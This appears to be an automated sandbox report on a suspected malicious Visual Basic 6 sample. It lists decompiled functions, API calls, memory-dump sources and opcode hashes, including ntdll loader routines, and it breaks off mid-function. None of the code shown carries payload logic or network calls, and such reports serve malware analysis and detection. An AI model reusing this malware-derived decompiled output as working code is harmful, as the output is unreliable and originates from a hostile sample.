                                                        • Opcode Fuzzy Hash: 75e45a3183b2907329e98f1ece8ba2cdf883f51a772ae8bbda9eb396501685da
                                                        • Instruction Fuzzy Hash: 7C313271E50208EFDB11EFE6D945BDEBBB4BF08704F10442AF501B62A0D7B96984CB29
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 60%
                                                        			E004109E1(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a32) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr* _v16;
                                                        				char _v28;
                                                        				signed int _v40;
                                                        				signed int _v52;
                                                        				signed int _t27;
                                                        				void* _t34;
                                                        				void* _t36;
                                                        				intOrPtr* _t37;
                                                        
                                                        				_t37 = _t36 - 0xc;
                                                        				 *[fs:0x0] = _t37;
                                                        				L00401210();
                                                        				_v16 = _t37;
                                                        				_v12 = 0x401130;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x401216, _t34);
                                                        				L0040130C();
                                                        				asm("fld1");
                                                        				 *_t37 = __fp0;
                                                        				_t27 =  *((intOrPtr*)( *_a4 + 0x10c))(_a4,  &_v28);
                                                        				asm("fclex");
                                                        				_v40 = _t27;
                                                        				if(_v40 >= 0) {
                                                        					_v52 = _v52 & 0x00000000;
                                                        				} else {
                                                        					_push(0x10c);
                                                        					_push(0x404514);
                                                        					_push(_a4);
                                                        					_push(_v40);
                                                        					L0040131E();
                                                        					_v52 = _t27;
                                                        				}
                                                        				asm("wait");
                                                        				_push(0x410a78);
                                                        				L00401306();
                                                        				return _t27;
                                                        			}













                                                        0x004109e4
                                                        0x004109f3
                                                        0x004109fd
                                                        0x00410a05
                                                        0x00410a08
                                                        0x00410a0f
                                                        0x00410a1e
                                                        0x00410a27
                                                        0x00410a2c
                                                        0x00410a2f
                                                        0x00410a3a
                                                        0x00410a40
                                                        0x00410a42
                                                        0x00410a49
                                                        0x00410a65
                                                        0x00410a4b
                                                        0x00410a4b
                                                        0x00410a50
                                                        0x00410a55
                                                        0x00410a58
                                                        0x00410a5b
                                                        0x00410a60
                                                        0x00410a60
                                                        0x00410a69
                                                        0x00410a6a
                                                        0x00410a72
                                                        0x00410a77

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 004109FD
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 00410A27
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00404514,0000010C), ref: 00410A5B
                                                        • __vbaFreeStr.MSVBVM60(00410A78), ref: 00410A72
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __vba$CheckChkstkCopyFreeHresult
                                                        • String ID:
                                                        • API String ID: 3646427762-0
                                                        • Opcode ID: 5ea3f1ee96162ac21878f8d401c7cbb9f48d7816fe1beef8b4c64f9d7af6f90a
                                                        • Instruction ID: 7716b84740cf269a5a246673997571b7d9083ca892c603aeb8015b397277a287
                                                        • Opcode Fuzzy Hash: 5ea3f1ee96162ac21878f8d401c7cbb9f48d7816fe1beef8b4c64f9d7af6f90a
                                                        • Instruction Fuzzy Hash: B5112A70940208EFCB01EF94C845BDD7BB4EF18744F10816AF904BB2A1C3B99A85CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E0041128A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v28;
                                                        				void* _v32;
                                                        				short _v36;
                                                        				signed int _v40;
                                                        				signed int _v52;
                                                        				signed int _t31;
                                                        				short _t32;
                                                        				void* _t39;
                                                        				void* _t41;
                                                        				intOrPtr _t42;
                                                        
                                                        				_t42 = _t41 - 0xc;
                                                        				 *[fs:0x0] = _t42;
                                                        				L00401210();
                                                        				_v16 = _t42;
                                                        				_v12 = 0x4011d8;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x401216, _t39);
                                                        				L0040130C();
                                                        				_t31 =  *((intOrPtr*)( *_a4 + 0x128))(_a4,  &_v36);
                                                        				asm("fclex");
                                                        				_v40 = _t31;
                                                        				if(_v40 >= 0) {
                                                        					_v52 = _v52 & 0x00000000;
                                                        				} else {
                                                        					_push(0x128);
                                                        					_push(0x404514);
                                                        					_push(_a4);
                                                        					_push(_v40);
                                                        					L0040131E();
                                                        					_v52 = _t31;
                                                        				}
                                                        				_t32 = _v36;
                                                        				_v28 = _t32;
                                                        				_push(0x411325);
                                                        				L00401306();
                                                        				return _t32;
                                                        			}
















                                                        0x0041128d
                                                        0x0041129c
                                                        0x004112a6
                                                        0x004112ae
                                                        0x004112b1
                                                        0x004112b8
                                                        0x004112c7
                                                        0x004112d0
                                                        0x004112e1
                                                        0x004112e7
                                                        0x004112e9
                                                        0x004112f0
                                                        0x0041130c
                                                        0x004112f2
                                                        0x004112f2
                                                        0x004112f7
                                                        0x004112fc
                                                        0x004112ff
                                                        0x00411302
                                                        0x00411307
                                                        0x00411307
                                                        0x00411310
                                                        0x00411314
                                                        0x00411317
                                                        0x0041131f
                                                        0x00411324

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 004112A6
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 004112D0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004011D8,00404514,00000128), ref: 00411302
                                                        • __vbaFreeStr.MSVBVM60(00411325), ref: 0041131F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __vba$CheckChkstkCopyFreeHresult
                                                        • String ID:
                                                        • API String ID: 3646427762-0
                                                        • Opcode ID: 7999376da3b9b74b39fed0972b46315ec1f19a8572d2332d7a28a22a0d7d4cbf
                                                        • Instruction ID: 48cd958be259184c27d84eb6308513cf8b0d75afe1df01352d58e835bafb8a10
                                                        • Opcode Fuzzy Hash: 7999376da3b9b74b39fed0972b46315ec1f19a8572d2332d7a28a22a0d7d4cbf
                                                        • Instruction Fuzzy Hash: 17110374940208AFDB00EF95C845BEEBBF4FB08754F10806AF904BB2A5C7799A45CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 316c4ad7c60feb8648d93478b44194236b0f91e9d8d310acc5511db81268e589
                                                        • Instruction ID: 4aba6a8080ac9f28fffa514b481f187143175a4b1d1c8b580af4c525e9da5c76
                                                        • Opcode Fuzzy Hash: 316c4ad7c60feb8648d93478b44194236b0f91e9d8d310acc5511db81268e589
                                                        • Instruction Fuzzy Hash: 6290027120100803D1C0716A441468E000597D1781FD1C125E0025614DCA559A5977E2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 5c2947f719a40d73189eb60a19002f624ea5288f20aa194b9006e050c02441fb
                                                        • Instruction ID: 85daf03f0df1cff84c1e1f2c98014d7a22f5d6efbd00b590cde655fd235101b8
                                                        • Opcode Fuzzy Hash: 5c2947f719a40d73189eb60a19002f624ea5288f20aa194b9006e050c02441fb
                                                        • Instruction Fuzzy Hash: 5890027120108803D150616A841478E000597D0781F95C521E4424618DC6D598917162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 20753689beae20d3efe6635595d66bfe4f2c3f7ffd1424afe498bb2d829feb6d
                                                        • Instruction ID: f4a2058290498c573d02a91e234f3eeb3009f6d034e0fad24c4f39439f03566a
                                                        • Opcode Fuzzy Hash: 20753689beae20d3efe6635595d66bfe4f2c3f7ffd1424afe498bb2d829feb6d
                                                        • Instruction Fuzzy Hash: 7390027120100403D14065AA541868A000597E0781F91D121E5024515EC6A598917172
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 52da63586eef093d4920d6853731d2edd752d9bbd13ecb01b6214f5c7eee472c
                                                        • Instruction ID: 7fd5324e903c70f97d079c21428eb1d2a83025e7d693ec39ee85060f472d2669
                                                        • Opcode Fuzzy Hash: 52da63586eef093d4920d6853731d2edd752d9bbd13ecb01b6214f5c7eee472c
                                                        • Instruction Fuzzy Hash: 0A90026130100003D180716A542864A4005E7E1781F91D121E0414514CD95598566263
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9593d29b766f107502c53bd9a5058fc19499c9fb5208aa73c1889dae21ae25b5
                                                        • Instruction ID: efe307d326d3633b88253cd6170707a5ffa101904c4cfe83ea36a72d676cc10e
                                                        • Opcode Fuzzy Hash: 9593d29b766f107502c53bd9a5058fc19499c9fb5208aa73c1889dae21ae25b5
                                                        • Instruction Fuzzy Hash: 7990026921300003D1C0716A541864E000597D1682FD1D525E0015518CC95598696362
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2a5f260a615e07993b2262cebe5b67656e7ea0fb67f707498be80699919ddb31
                                                        • Instruction ID: 5babd26b257aa963d3ca7cdde699d50dc9d2339bcf11ec74f36bad23cb927117
                                                        • Opcode Fuzzy Hash: 2a5f260a615e07993b2262cebe5b67656e7ea0fb67f707498be80699919ddb31
                                                        • Instruction Fuzzy Hash: AE900265211000030145A56A071454B004697D57D1391C131F1015510CD66198616162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2f119638be473d217dcbdb5a1c8102c5340e6468cdb75b6aa44ee4c2ace00584
                                                        • Instruction ID: 5ad0557e39fa07cae67b542c8b4a4fc8fb25f6964eb8bfcb2b11b617d56719a2
                                                        • Opcode Fuzzy Hash: 2f119638be473d217dcbdb5a1c8102c5340e6468cdb75b6aa44ee4c2ace00584
                                                        • Instruction Fuzzy Hash: 709002A1202000034145716A442465A400A97E0681B91C131E1014550DC56598917166
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b81978c24d3bd21c81cb5695a2daaedacd1a92197917bcc5fd30d5455cc9816c
                                                        • Instruction ID: ef8162a856f95cde59ec2f98cdc485defa695f717111ea1f99f84f9526217854
                                                        • Opcode Fuzzy Hash: b81978c24d3bd21c81cb5695a2daaedacd1a92197917bcc5fd30d5455cc9816c
                                                        • Instruction Fuzzy Hash: A3900261601000434180717A885494A4005BBE1691791C231E0998510DC599986566A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a444eda5c8975756f7ab425ed3fdac76759cf2a84be40112158f5e26d63dfe93
                                                        • Instruction ID: 189a0df60673384b791f471cf286305842269ccd59745f18aec4605dad7cf277
                                                        • Opcode Fuzzy Hash: a444eda5c8975756f7ab425ed3fdac76759cf2a84be40112158f5e26d63dfe93
                                                        • Instruction Fuzzy Hash: 8590027120140403D140616A482474F000597D0782F91C121E1164515DC665985175B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 87b884f4e22e80e87bf5d1377a055fdf78e60e8f5bc74981fa7b7cf02045872a
                                                        • Instruction ID: 3e66de946989344375fcaba3115cff85dbae8f10c9d2abd2fa6832f2e7bbc6f2
                                                        • Opcode Fuzzy Hash: 87b884f4e22e80e87bf5d1377a055fdf78e60e8f5bc74981fa7b7cf02045872a
                                                        • Instruction Fuzzy Hash: 5290026121180043D240657A4C24B4B000597D0783F91C225E0154514CC95598616562
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: aea258c10add58173968455284f2824fe5cb39811d63f3c0f7a6b751290e854d
                                                        • Instruction ID: b349b1f38f97136268df4b7d2be574d5f48db764f08aa498a76ca2d4a025e584
                                                        • Opcode Fuzzy Hash: aea258c10add58173968455284f2824fe5cb39811d63f3c0f7a6b751290e854d
                                                        • Instruction Fuzzy Hash: E090027120100413D151616A451474B000997D06C1FD1C522E0424518DD6969952B162
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a714a97545a4b328babd2a77473ea3e5a72a2d42afa58aaa3461b945a453a11a
                                                        • Instruction ID: 9db79a74084ebf9d49e50e3799e797d503dbaf1aac24ee99e2c9750f432e3c45
                                                        • Opcode Fuzzy Hash: a714a97545a4b328babd2a77473ea3e5a72a2d42afa58aaa3461b945a453a11a
                                                        • Instruction Fuzzy Hash: 68900261242041535585B16A441454B4006A7E06C17D1C122E1414910CC566A856E662
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 636807d7468e397ff7e3fd35bd08f34919b54259f3ed52061668f4be5846b47a
                                                        • Instruction ID: 5ccffb231e8e9a1ed7399d5055103ceb2ff5208b90d4c9969223e87d6a82372e
                                                        • Opcode Fuzzy Hash: 636807d7468e397ff7e3fd35bd08f34919b54259f3ed52061668f4be5846b47a
                                                        • Instruction Fuzzy Hash: 3090026160100503D141716A441465A000A97D06C1FD1C132E1024515ECA659992B172
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f4fa9d40044e7e208d9bf22243f44cb50ee1b698bed719413ffa699e005bc9e4
                                                        • Instruction ID: 558261d14578530be422361f1aaf0ae9257f3ee4ab3c0e4a3bbee78a4ec362ce
                                                        • Opcode Fuzzy Hash: f4fa9d40044e7e208d9bf22243f44cb50ee1b698bed719413ffa699e005bc9e4
                                                        • Instruction Fuzzy Hash: 889002B120100403D180716A441478A000597D0781F91C121E5064514EC6999DD576A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 0ce995c8471de63aeebbb0a6a5f409ee7c2dbc9f8b7ce9f14736de8fdbd80407
                                                        • Instruction ID: eee66c89932149f5fcb0fd7ac00f2599f1a3b6750c53228adb26a5fb3b2e2ce6
                                                        • Opcode Fuzzy Hash: 0ce995c8471de63aeebbb0a6a5f409ee7c2dbc9f8b7ce9f14736de8fdbd80407
                                                        • Instruction Fuzzy Hash: C39002A134100443D140616A4424B4A0005D7E1781F91C125E1064514DC659DC527167
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8a9a49f500d6ec4eb13666b8c967cc9e3d23206607fee9db0a67e8c29538d835
                                                        • Instruction ID: 280d359abc38f5a2bb46c3cf387434054f3d9915fa6e03cd05d34973b86c83ee
                                                        • Opcode Fuzzy Hash: 8a9a49f500d6ec4eb13666b8c967cc9e3d23206607fee9db0a67e8c29538d835
                                                        • Instruction Fuzzy Hash: 24B09B719014D6C7D641D771561871B7A017BD4B41F66C161D2030741E8778D091F5B6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        C-Code - Quality: 39%
                                                        			E1E298E00(void* __ecx) {
                                                        				signed int _v8;
                                                        				char _v12;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				intOrPtr* _t32;
                                                        				intOrPtr _t35;
                                                        				intOrPtr _t43;
                                                        				void* _t46;
                                                        				intOrPtr _t47;
                                                        				void* _t48;
                                                        				signed int _t49;
                                                        				void* _t50;
                                                        				intOrPtr* _t51;
                                                        				signed int _t52;
                                                        				void* _t53;
                                                        				intOrPtr _t55;
                                                        
                                                        				_v8 =  *0x1e35d360 ^ _t52;
                                                        				_t49 = 0;
                                                        				_t48 = __ecx;
                                                        				_t55 =  *0x1e358464; // 0x75150110
                                                        				if(_t55 == 0) {
                                                        					L9:
                                                        					if( !_t49 >= 0) {
                                                        						if(( *0x1e355780 & 0x00000003) != 0) {
                                                        							E1E2E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                        						}
                                                        						if(( *0x1e355780 & 0x00000010) != 0) {
                                                        							asm("int3");
                                                        						}
                                                        					}
                                                        					return E1E2AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                        				}
                                                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                        				_t43 =  *0x1e357984; // 0x882b48
                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                        					if(_t48 == _t43) {
                                                        						_t50 = 0x5c;
                                                        						if( *_t32 == _t50) {
                                                        							_push("true");
                                                        							_pop(_t46);
                                                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                        								_t32 = _t32 + 8;
                                                        							}
                                                        						}
                                                        					}
                                                        					_t51 =  *0x1e358464; // 0x75150110
                                                        					 *0x1e35b1e0(_t47, _t32,  &_v12);
                                                        					_t49 =  *_t51();
                                                        					if(_t49 >= 0) {
                                                        						L8:
                                                        						_t35 = _v12;
                                                        						if(_t35 != 0) {
                                                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                        								E1E299B10( *((intOrPtr*)(_t48 + 0x48)));
                                                        								_t35 = _v12;
                                                        							}
                                                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                        						}
                                                        						goto L9;
                                                        					}
                                                        					if(_t49 != 0xc000008a) {
                                                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                        							if(_t49 != 0xc00000bb) {
                                                        								goto L8;
                                                        							}
                                                        						}
                                                        					}
                                                        					if(( *0x1e355780 & 0x00000005) != 0) {
                                                        						_push(_t49);
                                                        						E1E2E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                        						_t53 = _t53 + 0x1c;
                                                        					}
                                                        					_t49 = 0;
                                                        					goto L8;
                                                        				} else {
                                                        					goto L9;
                                                        				}
                                                        			}




















                                                        0x1e298e0f
                                                        0x1e298e16
                                                        0x1e298e19
                                                        0x1e298e1b
                                                        0x1e298e21
                                                        0x1e298e7f
                                                        0x1e298e85
                                                        0x1e2d9354
                                                        0x1e2d936c
                                                        0x1e2d9371
                                                        0x1e2d937b
                                                        0x1e2d9381
                                                        0x1e2d9381
                                                        0x1e2d937b
                                                        0x1e298e9d
                                                        0x1e298e9d
                                                        0x1e298e29
                                                        0x1e298e2c
                                                        0x1e298e38
                                                        0x1e298e3e
                                                        0x1e298e43
                                                        0x1e298eb5
                                                        0x1e298eb9
                                                        0x1e2d92a8
                                                        0x1e2d92aa
                                                        0x1e2d92af
                                                        0x1e2d92e8
                                                        0x1e2d92e8
                                                        0x1e2d92af
                                                        0x1e298eb9
                                                        0x1e298e45
                                                        0x1e298e53
                                                        0x1e298e5b
                                                        0x1e298e5f
                                                        0x1e298e78
                                                        0x1e298e78
                                                        0x1e298e7d
                                                        0x1e298ec3
                                                        0x1e298ecd
                                                        0x1e298ed2
                                                        0x1e298ed2
                                                        0x1e298ec5
                                                        0x1e298ec5
                                                        0x00000000
                                                        0x1e298e7d
                                                        0x1e298e67
                                                        0x1e298ea4
                                                        0x1e2d931a
                                                        0x00000000
                                                        0x00000000
                                                        0x1e2d9320
                                                        0x1e298ea4
                                                        0x1e298e70
                                                        0x1e2d9325
                                                        0x1e2d9340
                                                        0x1e2d9345
                                                        0x1e2d9345
                                                        0x1e298e76
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 1E2D933B, 1E2D9367
                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 1E2D9357
                                                        • LdrpFindDllActivationContext, xrefs: 1E2D9331, 1E2D935D
                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E2D932A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 3446177414-3779518884
                                                        • Opcode ID: 49bf0e61a850786dbb45e68d92a2e974ef18a582ad333a75c9b5a32c2fef0006
                                                        • Instruction ID: c93f6098fcf43f9c9276935c4e4886fad3eebfb99cb104dafbe9273dc3967561
                                                        • Opcode Fuzzy Hash: 49bf0e61a850786dbb45e68d92a2e974ef18a582ad333a75c9b5a32c2fef0006
                                                        • Instruction Fuzzy Hash: F0412932A10377DFD7199B35C8B8A56F3A6BB44204F2E5729F98857291E7F06C80D681
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 50%
                                                        			E1E33E824(signed int __ecx, signed int* __edx) {
                                                        				signed int _v8;
                                                        				signed char _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				signed int _v36;
                                                        				signed int _v40;
                                                        				unsigned int _v44;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t177;
                                                        				signed int _t179;
                                                        				unsigned int _t202;
                                                        				signed char _t207;
                                                        				signed char _t210;
                                                        				signed int _t230;
                                                        				void* _t244;
